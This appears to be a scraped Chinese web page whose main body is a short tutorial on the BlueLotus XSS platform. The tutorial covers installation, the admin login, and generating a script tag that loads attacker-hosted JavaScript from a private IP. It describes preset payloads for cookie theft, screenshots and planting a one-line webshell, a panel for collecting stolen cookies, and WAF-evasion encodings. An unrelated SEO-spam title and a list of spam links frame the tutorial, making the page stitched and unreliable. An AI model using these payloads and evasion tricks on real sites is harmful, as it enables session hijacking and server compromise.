当前位置: 首页 > wzjs >正文

企业网站系统设计竞价广告点击软件

企业网站系统设计,竞价广告点击软件,导视设计,网络平台的推广营销方案目录 一、BlueLotus简介 二、系统安装与配置 1. 安装步骤 三、后台登录 四、核心功能使用 1. 我的JS 2. 公共模版 3. XSS接收面板 五、防御规避策略 一、BlueLotus简介 BlueLotus(蓝莲花)是一款功能强大的XSS漏洞测试与管理平台,它…

目录

一、BlueLotus简介

二、系统安装与配置

1. 安装步骤

三、后台登录

四、核心功能使用

1. 我的JS

2. 公共模版

3. XSS接收面板

五、防御规避策略


一、BlueLotus简介

BlueLotus(蓝莲花)是一款功能强大的XSS漏洞测试与管理平台,它提供了一个集中化的管理后台,可以帮助安全研究人员高效地管理和利用XSS漏洞。

图1:BlueLotus平台界面

二、系统安装与配置

1. 安装步骤

  1. 下载BlueLotus最新版本

  2. 解压到Web服务器目录

  3. 访问安装向导页面

  4. 按照提示完成数据库配置

三、后台登录

访问后台登录地址(通常为http://192.168.21.4/BlueLotus/login.php),输入管理员账号密码。

图2:后台登录界面

四、核心功能使用

1. 我的JS

发现XSS漏洞后,可以在"漏洞管理"中添加记录:

  1. 点击"新增"

  2. 选择插入模版

  3. 生成payload

  4. 复制js内容

<script src="http://192.168.21.4/BlueLotus/myjs/alert.js"></script>

图3:JS可进行编码

2. 公共模版

BlueLotus提供了多种预置的XSS攻击载荷:

  1. 弹框测试

  2. Cookie窃取

  3. 网站截屏

  4. 写一句话木马

图4:公共模版界面

3. XSS接收面板

在左侧菜单点击"项目管理"→"添加项目",填写项目信息:

  • 接收时间

  • 接收IP

  • 客户端

  • 携带数据

将构造的JS,插入存在xss漏洞的网站

图5:收到的接收cookie信息

五、防御规避策略

对抗WAF技巧,内置绕过方案:

  1. HTML标签变异(<svg/onload=>

  2. 编码混淆(JSFuck/AAEncode)

  3. 分块传输编码

http://www.dtcms.com/wzjs/355942.html

相关文章:

  • 找工作的网站有哪些?网站建设推广服务
  • 专业做装修的网站站长工具查询入口
  • 南昌市,做网站的公司搜索引擎平台排名
  • 潍坊企业免费建站免费网页制作成品
  • 国家卫生健康委健康中心seo百科大全
  • 新疆教育平台网站建设杭州百度推广公司有几家
  • 上海网站推荐四川全网推网络推广
  • 网站定制页面调整至居中2021年度关键词有哪些
  • 新闻网站建设汇报百度关键词价格
  • 网站建设系统教程seo工具是什么意思
  • 服务好的做培训网站口碑营销是什么意思
  • 专做会议发布的网站网站定制设计
  • 可以做兼职的网站推荐杭州seo网站优化
  • java web医疗网站开发360站长
  • 做网站域名的成本辽宁好的百度seo公司
  • 网站 如何做用户统计百度账号中心
  • 专业网站设计团队网络营销推广渠道有哪些
  • 一级a做爰网站中国什么是网络营销与直播电商
  • 东莞招聘信息快手seo软件下载
  • b2b电子商务网站的模式网页模板免费下载
  • 企业网站建设报价友链交换网站源码
  • 无锡新区做网站公司网络推广公司官网
  • 网站建设费用如何做账沈阳专业seo排名优化公司
  • 怎么做彩票平台网站吗怎么做电商
  • 江苏做网站怎么收费多少关键词智能调词工具
  • 广州网站设计公司推荐哪家互联网广告公司排名前十
  • 网站权限怎么弄电话投放小网站
  • 网站的提示公告做滚动字幕爱站关键词挖掘软件
  • 设计企业网站步骤推广专家
  • 做网站好深圳百度关键